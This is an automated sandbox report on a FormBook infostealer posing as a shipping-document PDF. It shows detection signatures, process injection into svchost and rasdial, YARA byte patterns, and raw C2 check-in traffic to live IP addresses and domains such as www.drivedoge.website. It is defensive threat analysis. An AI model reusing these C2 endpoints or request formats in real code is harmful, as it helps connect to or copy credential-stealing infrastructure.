Windows Analysis Report
z4Shipping_document_pdf.exe

Overview

General Information

Sample name: z4Shipping_document_pdf.exe
Analysis ID: 1522882
MD5: aeb5e672510e739f463553e45d7f7283
SHA1: 07ec11b8ab945f5560dae2f458a63a91a3653ad3
SHA256: 1a685b6a7199bf38e27672e7d65a403b8809fd83fb272e47cb26054a74d2dbe9
Tags: exe, Formbook, user-Porcupine

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious RASdial Activity
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • z4Shipping_document_pdf.exe (PID: 5644 cmdline: "C:\Users\user\Desktop\z4Shipping_document_pdf.exe" MD5: AEB5E672510E739F463553E45D7F7283)
    • svchost.exe (PID: 2848 cmdline: "C:\Users\user\Desktop\z4Shipping_document_pdf.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • fWXPcgRbOhi.exe (PID: 4068 cmdline: "C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • rasdial.exe (PID: 5356 cmdline: "C:\Windows\SysWOW64\rasdial.exe" MD5: A280B0F42A83064C41CFFDC1CD35136E)
          • fWXPcgRbOhi.exe (PID: 4508 cmdline: "C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6848 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.4553080384.0000000004E90000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000007.00000002.4553080384.0000000004E90000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x67c4e:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x4fddd:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.4550544505.0000000002A80000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000005.00000002.4550544505.0000000002A80000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2bc30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13dbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2533356134.00000000031A0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2f1d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17362:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2e3d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16562:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process started, Author: juju4, Data: Command: "C:\Windows\SysWOW64\rasdial.exe", CommandLine: "C:\Windows\SysWOW64\rasdial.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rasdial.exe, NewProcessName: C:\Windows\SysWOW64\rasdial.exe, OriginalFileName: C:\Windows\SysWOW64\rasdial.exe, ParentCommandLine: "C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe" , ParentImage: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe, ParentProcessId: 4068, ParentProcessName: fWXPcgRbOhi.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rasdial.exe", ProcessId: 5356, ProcessName: rasdial.exe
            Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\Desktop\z4Shipping_document_pdf.exe", CommandLine: "C:\Users\user\Desktop\z4Shipping_document_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\z4Shipping_document_pdf.exe", ParentImage: C:\Users\user\Desktop\z4Shipping_document_pdf.exe, ParentProcessId: 5644, ParentProcessName: z4Shipping_document_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\z4Shipping_document_pdf.exe", ProcessId: 2848, ProcessName: svchost.exe
            Source: Process started, Author: vburov, Data: Command: "C:\Users\user\Desktop\z4Shipping_document_pdf.exe", CommandLine: "C:\Users\user\Desktop\z4Shipping_document_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\z4Shipping_document_pdf.exe", ParentImage: C:\Users\user\Desktop\z4Shipping_document_pdf.exe, ParentProcessId: 5644, ParentProcessName: z4Shipping_document_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\z4Shipping_document_pdf.exe", ProcessId: 2848, ProcessName: svchost.exe


            AV Detection

            Source: z4Shipping_document_pdf.exe, ReversingLabs: Detection: 31%
            Source: Yara match, File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000007.00000002.4553080384.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.4550544505.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.2533356134.00000000031A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.2533799840.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.4550198146.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.4551356910.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.4551198252.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
            Source: z4Shipping_document_pdf.exe, Joe Sandbox ML: detected
            Source: z4Shipping_document_pdf.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fWXPcgRbOhi.exe, 00000004.00000002.4550106724.000000000074E000.00000002.00000001.01000000.00000005.sdmp, fWXPcgRbOhi.exe, 00000007.00000000.2599591367.000000000074E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: z4Shipping_document_pdf.exe, 00000000.00000003.2133449788.0000000004420000.00000004.00001000.00020000.00000000.sdmp, z4Shipping_document_pdf.exe, 00000000.00000003.2132500581.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, z4Shipping_document_pdf.exe, 00000000.00000003.2133989700.0000000004610000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2533390722.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2430527068.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2428480144.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2533327247.00000000043E0000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2535771557.0000000004599000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4551581799.00000000048DE000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4551581799.0000000004740000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdb source: svchost.exe, 00000002.00000002.2533187407.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2490844881.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, fWXPcgRbOhi.exe, 00000004.00000002.4550908137.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, fWXPcgRbOhi.exe, 00000004.00000003.2460894338.00000000013F5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: z4Shipping_document_pdf.exe, 00000000.00000003.2133449788.0000000004420000.00000004.00001000.00020000.00000000.sdmp, z4Shipping_document_pdf.exe, 00000000.00000003.2132500581.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, z4Shipping_document_pdf.exe, 00000000.00000003.2133989700.0000000004610000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2533390722.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2430527068.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2428480144.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000005.00000003.2533327247.00000000043E0000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2535771557.0000000004599000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4551581799.00000000048DE000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4551581799.0000000004740000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000002.00000002.2533187407.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2490844881.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, fWXPcgRbOhi.exe, 00000004.00000002.4550908137.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, fWXPcgRbOhi.exe, 00000004.00000003.2460894338.00000000013F5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: rasdial.exe, 00000005.00000002.4550647811.0000000002B0A000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4551985733.0000000004D6C000.00000004.10000000.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000007.00000000.2599974603.0000000002A5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2818567202.0000000036E4C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: rasdial.exe, 00000005.00000002.4550647811.0000000002B0A000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4551985733.0000000004D6C000.00000004.10000000.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000007.00000000.2599974603.0000000002A5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2818567202.0000000036E4C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Windows\SysWOW64\rasdial.exe, Code function: 5_2_0281C1E0 FindFirstFileW, FindNextFileW, FindClose
            Source: C:\Windows\SysWOW64\rasdial.exe, Code function: 4x nop then xor eax, eax (5_2_02809B60)
            Source: C:\Windows\SysWOW64\rasdial.exe, Code function: 4x nop then pop edi (5_2_0280DD4C)
            Source: C:\Windows\SysWOW64\rasdial.exe, Code function: 4x nop then mov ebx, 00000004h (5_2_045E04E6)
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe, Code function: 4x nop then xor eax, eax (7_2_04ED5B7E)

            Networking

            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49739 -> 52.223.13.41:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49718 -> 18.141.10.107:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49723 -> 197.189.237.186:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49713 -> 195.161.68.8:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49738 -> 52.223.13.41:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49731 -> 162.0.238.246:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49741 -> 188.114.96.3:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49720 -> 18.141.10.107:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49729 -> 162.0.238.246:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49761 -> 136.143.186.12:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49737 -> 52.223.13.41:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49714 -> 195.161.68.8:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49732 -> 162.0.238.246:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49719 -> 18.141.10.107:80
            Source: Network traffic, Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.5:49720
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49721 -> 197.189.237.186:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49725 -> 203.175.9.128:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49712 -> 54.67.87.110:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49724 -> 197.189.237.186:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49745 -> 206.119.82.147:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49740 -> 52.223.13.41:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49736 -> 31.31.196.17:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49717 -> 18.141.10.107:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49754 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49722 -> 197.189.237.186:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49726 -> 203.175.9.128:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49715 -> 195.161.68.8:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49760 -> 144.34.186.85:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49728 -> 203.175.9.128:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49763 -> 136.143.186.12:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49727 -> 203.175.9.128:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49743 -> 188.114.96.3:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49755 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49747 -> 206.119.82.147:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49752 -> 46.17.172.49:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49759 -> 144.34.186.85:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49749 -> 46.17.172.49:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49742 -> 188.114.96.3:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49756 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49753 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49744 -> 188.114.96.3:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49716 -> 195.161.68.8:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49730 -> 162.0.238.246:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49748 -> 206.119.82.147:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49762 -> 136.143.186.12:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49750 -> 46.17.172.49:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49757 -> 144.34.186.85:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49758 -> 144.34.186.85:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49733 -> 31.31.196.17:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49734 -> 31.31.196.17:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49751 -> 46.17.172.49:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49735 -> 31.31.196.17:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49746 -> 206.119.82.147:80
            Source: DNS query: www.ngmr.xyz
            Source: DNS query: www.animekuid.xyz
            Source: DNS query: www.huyven.xyz
            Source: Joe Sandbox View, IP Address: 136.143.186.12
            Source: Joe Sandbox View, ASN Name: NAMECHEAP-NETUS
            Source: Joe Sandbox View, ASN Name: ZOHO-ASUS
            Source: Joe Sandbox View, ASN Name: xneeloZA
            Source: Joe Sandbox View, ASN Name: COGENT-174US
            Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownHTTP traffic detected: POST /czka/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheContent-Length: 209Host: www.drivedoge.websiteOrigin: http://www.drivedoge.websiteReferer: http://www.drivedoge.website/czka/User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)Data Raw: 46 62 75 58 35 44 6e 50 3d 54 65 57 66 36 66 70 54 6b 45 66 66 69 4a 67 35 37 58 35 6d 75 65 51 43 6f 58 45 6e 58 61 78 37 6f 33 70 69 62 64 52 6e 33 41 64 68 52 2b 58 62 41 64 41 6a 79 37 75 4b 6f 39 2b 6f 71 6b 37 33 2f 38 63 76 42 34 78 4c 6c 66 65 2b 68 6f 4e 45 72 6d 72 53 70 35 66 61 44 64 34 2f 45 4d 5a 49 66 6a 52 69 46 4e 52 67 78 44 75 78 73 44 33 73 48 50 36 68 34 75 44 43 55 41 4b 6d 68 37 6e 54 58 2f 58 68 69 67 6f 4f 52 67 52 59 66 79 65 49 55 54 54 62 63 6d 2f 4b 32 4e 42 41 2f 4b 6c 44 52 67 78 66 36 64 6d 74 34 37 30 68 42 38 4f 42 78 7a 66 36 6d 72 2b 35 35 35 4c 6d 61 4e 43 70 4b 50 72 78 77 4c 73 3d Data Ascii: FbuX5DnP=TeWf6fpTkEffiJg57X5mueQCoXEnXax7o3pibdRn3AdhR+XbAdAjy7uKo9+oqk73/8cvB4xLlfe+hoNErmrSp5faDd4/EMZIfjRiFNRgxDuxsD3sHP6h4uDCUAKmh7nTX/XhigoORgRYfyeIUTTbcm/K2NBA/KlDRgxf6dmt470hB8OBxzf6mr+555LmaNCpKPrxwLs=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Mon, 30 Sep 2024 18:19:39 GMTX-Varnish: 1107661128Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 75 38 37 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fu87/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 17:57:15 GMTContent-Type: text/htmlContent-Length: 634Connection: closeServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 8c 20 d0 bf d1 80 d0 b8 20 d0 bd d0 b0 d0 b1 d0 be d1 80 d0 b5 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d0 b0 2c 20 